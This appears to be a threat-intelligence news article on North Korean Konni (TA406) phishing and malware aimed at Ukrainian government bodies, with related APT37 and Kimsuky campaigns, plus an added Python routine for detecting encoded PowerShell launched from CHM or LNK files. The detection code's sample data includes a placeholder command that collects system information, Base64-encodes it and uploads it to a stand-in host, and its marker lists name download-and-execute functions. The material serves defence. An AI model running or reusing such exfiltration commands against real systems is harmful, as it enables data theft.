North Korean Konni APT Leverages Malware to Monitor Developments in the Russian Invasion of Ukraine
The North Korean threat actor known as Konni APT has recently been implicated in a phishing campaign targeting government entities in Ukraine, expanding its focus beyond previous targets in Russia. This shift suggests a strategic interest in gathering intelligence related to the ongoing Russian invasion, as reported by enterprise security firm Proofpoint. Researchers Greg Lesnewich, Saher Naumaan, and Mark Kelly noted that this group’s activities have historically involved the collection of strategic intelligence, particularly concerning government entities.
Konni APT, also tracked as Opal Sleet, Osmium, TA406, or Vedalia, is a cyber espionage group that has been active since at least 2014. It has a documented history of targeting entities in South Korea, the United States, and Russia. The group commonly relies on phishing emails to deliver its malware, chiefly Konni RAT (also known as UpDog), and to steer recipients to credential harvesting websites. In an earlier analysis published in November 2021, Proofpoint described TA406 as one of several actors it tracks whose activity overlaps with what has been publicly reported under the names Kimsuky, Thallium, and Konni Group.
The current wave of attacks uses phishing emails that pose as correspondence from a fictitious senior fellow at the non-existent Royal Institute of Strategic Studies. The messages direct targets to a password-protected RAR archive hosted on the MEGA cloud service, with the password supplied in the email body; opening the file inside the archive starts an infection chain designed to monitor the compromised system.
The RAR archive contains a CHM file whose fabricated content concerns former Ukrainian military leader Valeriy Zaluzhnyi. When the victim opens the CHM file, it executes a PowerShell command that connects to an external server to download further payloads. The downloaded PowerShell script can run commands that collect system information, Base64-encode the results, and transmit them to the threat actor's server.
Notably, when the initial phishing attempts fail, the actor has sent follow-up emails on consecutive days asking whether the recipient received the earlier messages and urging them to download the files. Proofpoint has also observed a variant in which an HTML file is attached directly to the phishing email; it instructs the victim to click an embedded link, which downloads a ZIP archive containing a benign PDF and a Windows shortcut (LNK) file. Executing the LNK file runs Base64-encoded PowerShell commands that drop a JScript Encoded file named "Themes.jse," which in turn contacts a remote server to retrieve and execute further instructions. The specific nature of these later payloads remains undetermined at this time.
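Both chains described above (a CHM file opened by the Windows HTML Help viewer, hh.exe, launching PowerShell; and an LNK file running a Base64-encoded PowerShell command that hands off to a .jse script) leave the same artefact in process telemetry: powershell.exe started with an -EncodedCommand blob, which is UTF-16LE text Base64-encoded, and so can be decoded and inspected in the detection pipeline. The following Python triage routine is an added example, not Proofpoint's code and not anything recovered from the campaign. The process-creation events, the placeholder script bodies, the `placeholder.invalid` host, and the marker strings used as heuristics are all constructed for this example.

```python
import base64
import re

# Constructed sample process-creation events. They are invented for this
# example and are not Konni/TA406 telemetry; the field names loosely follow
# what Sysmon Event ID 1 or an EDR would record for each new process.

# Common spellings of the -EncodedCommand switch (PowerShell also accepts other
# unambiguous prefixes; extend the pattern if your telemetry shows them).
ENC_FLAG = re.compile(r"^-(?:e|ec|enc|encoded|encodedcommand)$", re.IGNORECASE)

# hh.exe is the Windows HTML Help viewer that opens CHM files; a help file
# spawning PowerShell corresponds to the CHM stage of the chain described above.
SUSPICIOUS_PARENTS = {"hh.exe"}

# Heuristic markers (chosen for this example) matching the behaviour the article
# describes: Base64-encoding collected data, fetching a second stage, or
# launching a .jse file.
PAYLOAD_MARKERS = (
    "frombase64string", "tobase64string", "downloadstring", "downloadfile",
    "invoke-webrequest", "net.webclient", "invoke-expression", ".jse",
)


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the command line has none.

    Splits on whitespace only: Base64 never contains spaces, so the quoting
    rules for the rest of the command line do not matter for locating the blob.
    """
    args = cmdline.split()
    for flag, blob in zip(args, args[1:]):
        if ENC_FLAG.match(flag):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # switch present but the blob is not valid UTF-16LE Base64
    return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return one finding per event that matches the CHM/LNK -> PowerShell -> .jse pattern."""
    findings = []
    for ev in events:
        parent, image = basename(ev["parent"]), basename(ev["image"])
        reasons, decoded = [], None
        if image in ("powershell.exe", "pwsh.exe"):
            if parent in SUSPICIOUS_PARENTS:
                reasons.append(f"powershell spawned by {parent}")
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None:
                reasons.append("encoded command")
                hits = [m for m in PAYLOAD_MARKERS if m in decoded.lower()]
                if hits:
                    reasons.append("decoded payload references " + ", ".join(hits))
        elif image in ("wscript.exe", "cscript.exe") and ".jse" in ev["cmdline"].lower():
            reasons.append(f"{image} running a .jse script")
        if reasons:
            findings.append({"parent": parent, "image": image,
                             "reasons": reasons, "decoded": decoded})
    return findings


# Placeholder stand-in for the collect -> Base64 -> upload behaviour the article
# describes. The host is a reserved .invalid name; nothing here is the real payload.
SAMPLE_SCRIPT = (
    '$info = systeminfo | Out-String; '
    '$b = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($info)); '
    'Invoke-WebRequest -Uri "http://placeholder.invalid/upload" -Method POST -Body $b'
)
# Placeholder stand-in for an LNK-launched command that hands off to Themes.jse.
JSE_LAUNCH = r'wscript.exe "$env:TEMP\Themes.jse"'

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\hh.exe", "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + encode_ps(SAMPLE_SCRIPT)},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -w hidden -enc " + encode_ps(JSE_LAUNCH)},
    {"parent": PS, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\user\AppData\Local\Temp\Themes.jse"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -Command Get-Date"},  # benign: no encoded blob, ordinary parent
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['parent']} -> {f['image']}: {'; '.join(f['reasons'])}")
        if f["decoded"]:
            print("   decoded:", f["decoded"][:80])
```

An encoded command on its own is a weak signal (administrative tooling uses it too), which is why the routine records the parent process and the decoded content separately: the hh.exe parent and the decoded references to Base64 helpers, web downloads, or a .jse path are what raise the finding from "look at this" to "this matches the chain".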
TA406 has also targeted Ukrainian government entities with counterfeit Microsoft security alerts sent from ProtonMail accounts. The messages warn of suspicious sign-in activity from U.S.-based IP addresses and prompt the recipient to verify the account through an embedded link. The credential harvesting page behind these alerts has not yet been recovered, but the campaign has been tied to a compromised domain previously used to harvest credentials, including Naver logins.
These credential harvesting initiatives occurred before the malware deployment attempts and were aimed at users who received the HTML delivery campaign. Researchers suggest that TA406 is likely focused on intelligence gathering to gauge the current risks to North Korean forces involved in the conflict, as well as assessing the likelihood of Russia seeking additional military support.
In contrast to Russian threat groups that may be focused on tactical battlefield intelligence, TA406 has historically concentrated on broader strategic political intelligence.
Recent disclosures indicate that the Konni group has also been linked to an advanced multi-stage malware campaign aimed at South Korean entities, involving ZIP archives containing LNK files that deploy PowerShell scripts responsible for extracting a CAB archive, eventually leading to the installation of batch script malware capable of exfiltrating sensitive data to remote servers.
On a related note, cybersecurity firm AhnLab reported that Kimsuky has employed PEBBLEDASH within multi-stage infection sequences initiated through spear-phishing, aligning with observed tactics that leverage LNK files during the initial attack phases. This malware has been previously associated with the Lazarus Group.
Konni and Kimsuky are not the only North Korean actors focused on South Korea. In March 2025, a campaign attributed to APT37, also known as ScarCruft, targeted activists working on North Korean issues. Dubbed Operation ToyBox Story, this spear-phishing operation used an email containing a Dropbox link to a malicious shortcut file. The shortcut opened a decoy document while launching a sequence of payloads that ended in the deployment of RokRAT, malware long linked to APT37.
RokRAT is designed to gather system data, capture screenshots, and utilize various cloud services for command-and-control operations. This incident underscores the persistent threats posed by North Korean cyber actors, who continue to adapt their attack methodologies, utilizing legitimate cloud infrastructure while focusing on stealthy techniques to evade detection by existing cybersecurity measures.